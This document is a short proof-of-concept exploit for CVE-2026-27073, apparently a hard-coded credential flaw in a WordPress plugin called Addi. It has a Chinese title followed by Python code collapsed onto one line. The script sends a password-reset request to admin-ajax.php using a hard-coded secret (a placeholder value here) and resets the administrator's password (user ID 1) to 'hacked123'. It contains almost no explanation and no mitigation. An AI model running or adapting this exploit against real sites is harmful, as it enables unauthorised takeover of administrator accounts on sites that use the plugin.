CVE-2026-27073：Addi插件硬编码凭证漏洞

import requests def exploit(target_url): # POC for CVE-2026-27073: Hard-coded Credentials leading to Password Recovery # Extracted hardcoded secret from plugin source (example value) hardcoded_secret = "HARDCODED_SECRET_KEY" # Target endpoint for password recovery endpoint = f"{target_url}/wp-admin/admin-ajax.php" # Payload utilizing the hardcoded credential payload = { "action": "addi_reset_password", "auth_key": hardcoded_secret, "user_id": "1", # Targeting admin "new_pass": "hacked123" } try: response = requests.post(endpoint, data=payload) if response.status_code == 200 and "success" in response.text.lower(): print("[+] Exploit successful! Password reset.") else: print("[-] Exploit failed or patch applied.") except Exception as e: print(f"[!] Error: {e}") if __name__ == "__main__": import sys if len(sys.argv) > 1: exploit(sys.argv[1])